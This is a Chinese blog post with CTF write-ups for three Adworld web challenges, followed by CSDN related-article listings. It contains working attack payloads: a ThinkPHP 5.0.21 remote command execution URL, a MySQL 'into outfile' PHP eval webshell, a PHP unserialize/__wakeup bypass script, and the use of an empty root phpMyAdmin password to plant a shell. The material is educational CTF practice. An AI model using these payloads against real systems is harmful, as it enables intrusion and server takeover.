攻防世界Web “Web_php_unserialize、php_rce、Web_php_include”题解

已于 2022-04-18 21:59:58 修改
阅读量2.5k 收藏 4
点赞数 2
文章标签: web安全 php mysql
于 2022-04-06 00:22:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53325209/article/details/123975483
版权

Web安全

周记(3)

—题解

文章目录

前言

三题均来自攻防世界WEB高手进阶区题目。

一、知识补充

①ThinkPHP5.0.21存在远程命令执行漏洞:
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令参数

②MySQL数据库用一句话木马拿到webshell:
select "<?php @eval($_POST['pass']);?>" into outfile '/tmp/test.php'

③ php中带有双下划线(__)的是魔术方法,会在满足条件时自动调用;
序列化是把数据类型压缩成一个字符串,方便处理,反序列化是把字符串还原成数据类型;
正则表达式用于匹配字符串。

④__wakeup()存在一个缺陷,__wakeup 触发于 unserilize()调用之前,
但是如果被反序列话的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时使得__wakeup 失效。

⑤正则表达式:’/[oc]:\d+:/i’
/XXXX/: php的正则表达式需要放在// 之间
末尾的i:修饰符,表示忽略大小写
[oc]:匹配o和c
\d: 匹配一个数字
\d+: 匹配多个数字

二、做题

1.Web_php_unserialize

题目描述:

在这里插入图片描述

解题思路:

题目展现一段 php 代码,显然先进行代码审计。

<?php 
class Demo { 
    private $file = 'index.php';//定义一个私有变量。
    public function __construct($file) { //定义一个方法作为构造函数。
        $this->file = $file; //用来引用对象的成员。
    }
    function __destruct() { //析构函数。
        echo @highlight_file($this->file, true); //函数对文件进行语法高亮显示,如果 return 参数被设置为 true,那么该函数会返回被高亮处理的代码。
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { //判断file参数是不是,Index.php,如果不是的话,让file=index.php。
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { //检测是否传递了get请求的var变量。
    $var = base64_decode($_GET['var']); //对var变量进行base64解码。
    if (preg_match('/[oc]:\d+:/i', $var)) { //preg_match — 执行匹配正则表达式,返回匹配到的次数。
        die('stop hacking!');//die等同于exit() 。
    } else {
        @unserialize($var); //反序列化:unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。
    } 
} else { 
    highlight_file("index.php"); //输出index.php。
} 
?>

解题整体思路为构造一个PHP代码,实现:对 Demo 这个类进行序列化,base 64 加密之后,赋值给var 变量进行 GET 传参。

反序列化字符串的创建时初始化变量应该是fl4g.php;
构造函数__construct() ,在程序执行开始的时候对变量进行赋初值;
析构函数 __destruct(),在对象所在函数执行完成之后,会自动调用,这里就会高亮显示出文件;
在反序列化执行之前,会先执行 __wakeup 这个魔术方法,所以需要绕过,当成员属性数目大于实际数目时可绕过 wakeup 方法,正则匹配可以用 + 号来进行绕过。

如下:

<?php
class Demo {
 private $file = 'fl4g.php'; // $file 改成 fl4g.php
 }
 $a= serialize(new demo);
 $a= str_replace('O:4', 'O:+4',$a); //绕过 preg_match
 $a= str_replace(':1:', ':2:',$a); //绕过 wakeup函数
 echo base64_encode($a);//对参数进行base编码
 ?>

使用phpstudy等工具运行php代码,得到base64编码值。

在这里插入图片描述传递var参数值,得到flag。

在这里插入图片描述

2.php_rce

题目描述:

在这里插入图片描述

解题思路:

由题目描述,知道thinkphp是5.0版本,猜测存在RCE漏洞,从网上查询,使用index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls,先尝试进行目录查询。
在这里插入图片描述可知,网站的确存在远程命令执行漏洞,使用index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=find / -name flag找到名为flag的文件。
在这里插入图片描述用cat命令查看它,即可成功获得flag。
在这里插入图片描述

3.Web_php_include

题目描述:

在这里插入图片描述

解题思路:

由题目可知,本题涉及php文件包含,但我们换一个比较简单的思路。
直接先用御剑后台扫描工具对网站进行扫描。
在这里插入图片描述发现phpadmin后台,打开网址。用户名为root,密码为空,发现可以直接登录。
在这里插入图片描述然后进行SQL语句输入,编辑一句话木马select "<?php @eval($_POST['pass']);?>" into outfile '/tmp/test.php'
点击执行,发现成功。

在这里插入图片描述使用中国蚁剑工具,添加数据,填写好URL地址:http://111.200.241.244:65297/?page=/tmp/test.php和密码:pass
在这里插入图片描述发现了一个疑似flag的文件。
在这里插入图片描述
打开即成功获得了flag。

在这里插入图片描述

总结

以上就是本周主要题解内容,主要涉及ThinkPHP5.0.21存在远程命令执行漏洞、MySQL数据库一句话木马、php文件包含、php代码审计(魔术方法__wakeup()、正反序列化、正则表达式)等知识点,和中国蚁剑、御剑后台扫描工具、phpstudy等工具的使用。

bright flavor
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
攻防世界 Web_php_include的多种解法(含相关的伪协议用法)
Pr0m1se1n的博客
07-22 994
攻防世界 Web_php_include的多种解法 在刷攻防世界题目的时候,发现这道题可以有很多解法哦,所以写个小总结记录一下。(如有不对,大佬们轻点喷) <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 关
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4238
ctf学习记录
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4463
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
【CTF | 网络安全攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9061
该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。我是秋说,我们下次见。
i 春秋 web 题 <include>
慢慢变小佬的博客
08-22 1985
打开链接地址:http://454e308408314446b0961f6226b502e7ad8cd9afd5614658.game.ichunqiu.com/ 题题目中以给出提示,这是文件包含题,打开题目链接后出现: 代码中包含一个phpinfo.php文件,试着去打开这个文件,什么也没有发现。而且可以发现改代码是没有防护的文件包含。 既然是关于php的,可以使用php协议 在该链接下...
PHP中json_encode、json_decode与serializeunserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
phpserialize::bookmark_tabs:PHP serialize()和unserialize()for Go
05-05
安装更新go get -u github.com/elliotchance/phpserialize phpserialize需要Go 1.8+。例子package mainimport ("fmt""github.com/elliotchance/phpserialize")func main () {out , err := phpserialize . Marshal ( ...
phpunserialize返回false的解决方法
10-25
主要介绍了phpunserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3318
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
[吃烤羊腿烫烫烫] Web_php_include 题解分析
布屿
02-28 3246
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0.分析代码 我们先来分析一下代码吧。 &lt...
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5666
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 8268
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 419
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 440
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界 Web_php_include(include)
Haowill的博客
04-15 964
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1196
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
php一些函数
m0_54015794的博客
01-15 236
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
攻防世界web_php_include
qq_60905276的博客
11-12 253
看到题目分析一波什么意思,首先前面Get hello这个参数没用。 要get page这个参数,然后循环匹配php://,接着把“php://”转换为“ ”。 有两种方法。 第一:大写绕过 因为我查到strstr()这个函数是区分大小写的,大写PHP://就可以绕过再用input输入要执行的命令就行了。 page=PHP://input 这个命令可以再url上直接输入,也可以在抓包后输入。 先查看文件目录 <php? system("ls");?> 发现文件,再显示文件...
ctf 文件上传 蚁剑
最新发布
10-18
好的,你想知道关于 ctf 文件上传和蚁剑的信息,我可以为你解答。首先,CTF(Capture The Flag)是一种网络安全竞赛,其中包含了各种各样的题目,其中有一类题目就是文件上传。而蚁剑是一款常用的网络安全工具,可以用来连接远程服务器进行文件管理、命令执行等操作。那么,你想了解哪方面的信息呢? 相关问题: 1. CTF 文件上传的原理是什么? 2. 蚁剑的使用方法有哪些? 3. 蚁剑是否存在安全风险?如何防范?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值